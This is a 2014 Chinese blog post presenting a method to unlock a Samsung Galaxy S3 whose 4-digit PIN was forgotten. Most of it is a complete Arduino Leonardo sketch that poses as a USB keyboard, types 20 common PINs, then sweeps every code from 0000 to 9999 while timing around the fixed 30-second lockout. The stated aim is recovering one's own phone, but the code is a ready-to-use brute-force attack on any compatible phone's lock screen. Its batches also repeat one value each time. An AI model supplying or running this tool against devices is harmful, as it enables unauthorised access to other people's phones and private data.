@plantpark
2014-08-14T13:54:04.000000Z
用过安卓手机的小伙伴们多半有过这样的惨痛经历:忘记了手机的解锁图形或PIN码。但如果通过Root等方式破解,手机恐怕就再也无法得到官方保修了,这里就介绍一种安全的破解方法!

三星Galaxy S3手机在输错5次PIN码后,会要求等待30s才能重新输入。幸运的是,这个等待时间是固定的,不会随着输错次数的增加而延长,所以4位PIN码的全部组合可以在有限的时间内试完,这就给了hack的机会。
因为Arduino Leonardo可以作为HID设备模拟键盘通过USB OTG连接到手机,在这里我就选用了Leonardo,文章末尾有详细的代码。为了减少破解时间,可以把自己常用的密码或者数字组合优先测试。
当然,三星Galaxy S3手机的PIN码只有四位,如果从0000一直尝试到9999大概只需要16个小时,如果你的手机碰巧是小米手机,PIN码又碰巧设了17位,那你就果断Root吧~~

/*
 * Brute forcing Android 4 Digit PINs
 *
 * To run the whole range it will take upwards of 16 hours because of
 * the 30 second delay after 5 bad inputs.
 *
 * Interestingly, if the target phone has the pattern enabled
 * and the backup PIN set, the backup PIN entry system
 * doesn't force the 30 second delay after invalid attempts.
 *
 * http://blog.infosecsee.com
 *
 * Overview: the sketch types PIN candidates through the Keyboard object in
 * batches of five entries, pausing 30000 ms after each batch. It starts when
 * the pushbutton input changes to HIGH.
 *
 * NOTE(review): every delay below is hard-coded around a lock screen that
 * always waits the same 30 s after 5 wrong entries and that accepts input
 * from an attached keyboard. A lock screen whose delay grows with repeated
 * failures, or that wipes or locks out after a failure limit, does not match
 * these assumptions.
 */
const int buttonPin = 2; // input pin for pushbutton
int previousButtonState = HIGH; // button state seen on the previous loop() pass, for edge detection
int counter = 0; // numeric value of the next candidate to type; the sweep runs while it is below 10000
int check = 0; // 0 until the fixed list of common PINs has been typed once, then 1

// Configures the button pin as an input and starts keyboard emulation.
void setup() {
  pinMode(buttonPin, INPUT);
  Keyboard.begin();
}

// Polls the button; on a change to HIGH it runs the whole sequence to the end.
// The inner loops block, so loop() does not return until counter reaches 10000.
void loop() {
  int buttonState = digitalRead(buttonPin);
  // Act only on a transition to HIGH, not while the level is merely held.
  if ((buttonState != previousButtonState) && (buttonState == HIGH)) {
    Mouse.move(25, 50, 0); // relative pointer movement; presumably keeps the screen awake, confirm on device
    // Prefixes prepended to counter in the branches further down.
    String three = "000";
    String two = "00";
    String one = "0";
    while(counter < 10000){
      delay(1000);
      // Phase 1, executed once (check goes 0 -> 1): a fixed list of 20 commonly
      // chosen PINs, typed in four batches of five.
      while (check < 1){
        Keyboard.println("1234"); delay(500);
        Keyboard.println("1111"); delay(500);
        Keyboard.println("0000"); delay(500);
        Keyboard.println("1212"); delay(500);
        Keyboard.println("7777");
        // Two empty lines (Enter twice); presumably dismisses the lockout
        // notice, TODO confirm on device.
        Keyboard.println("");
        Keyboard.println("");
        delay(30000); // wait out the 30 second lockout described in the header
        Mouse.move(25, 50, 0);
        Keyboard.println("1004"); delay(500);
        Keyboard.println("2000"); delay(500);
        Keyboard.println("4444"); delay(500);
        Keyboard.println("2222"); delay(500);
        Keyboard.println("6969");
        Keyboard.println("");
        Keyboard.println("");
        delay(30000);
        Mouse.move(25, 50, 0);
        Mouse.move(25, 50, 0);
        Keyboard.println("9999"); delay(500);
        Keyboard.println("3333"); delay(500);
        Keyboard.println("5555"); delay(500);
        Keyboard.println("6666"); delay(500);
        Keyboard.println("1122");
        Keyboard.println("");
        Keyboard.println("");
        delay(30000);
        Mouse.move(25, 50, 0);
        Keyboard.println("1313"); delay(500);
        Keyboard.println("8888"); delay(500);
        Keyboard.println("4321"); delay(500);
        Keyboard.println("2001"); delay(500);
        Keyboard.println("1010"); delay(500);
        Keyboard.println("");
        Keyboard.println("");
        delay(30000);
        Mouse.move(25, 50, 0);
        check++;
      }
      // Phase 2: numeric sweep. Each pass types five entries and increments
      // counter four times, then waits 30000 ms. The prefix is selected from
      // counter's value at the start of the pass.
      if (counter < 10 && check == 1) {
        Keyboard.println(three + counter); delay(500); counter++;
        Keyboard.println(three + counter); delay(500); counter++;
        Keyboard.println(three + counter); delay(500); counter++;
        Keyboard.println(three + counter); delay(500); counter++;
        Keyboard.println(three + counter); delay(500);
        Keyboard.println("");
        Keyboard.println("");
        delay(30000);
        Mouse.move(25, 50, 0);
      }
      else if (counter < 100){
        Keyboard.println(two + counter); delay(500); counter++;
        Keyboard.println(two + counter); delay(500); counter++;
        Keyboard.println(two + counter); delay(500); counter++;
        Keyboard.println(two + counter); delay(500); counter++;
        Keyboard.println(two + counter); delay(500);
        Keyboard.println("");
        Keyboard.println("");
        delay(30000);
        Mouse.move(25, 50, 0);
      }
      else if (counter < 1000){
        Keyboard.println(one + counter); delay(500); counter++;
        Keyboard.println(one + counter); delay(500); counter++;
        Keyboard.println(one + counter); delay(500); counter++;
        Keyboard.println(one + counter); delay(500); counter++;
        Keyboard.println(one + counter); delay(500);
        Keyboard.println("");
        Keyboard.println("");
        delay(30000);
        Mouse.move(25, 50, 0);
      }
      else {
        // 1000 and above: the value is typed with no prefix.
        Keyboard.println(counter); delay(500); counter++;
        Keyboard.println(counter); delay(500); counter++;
        Keyboard.println(counter); delay(500); counter++;
        Keyboard.println(counter); delay(500); counter++;
        Keyboard.println(counter); delay(500);
        Keyboard.println("");
        Keyboard.println("");
        delay(30000);
        Mouse.move(25, 50, 0);
      }
    }
  }
  // Remember this pass's level so the next pass can detect a change.
  previousButtonState = buttonState;
}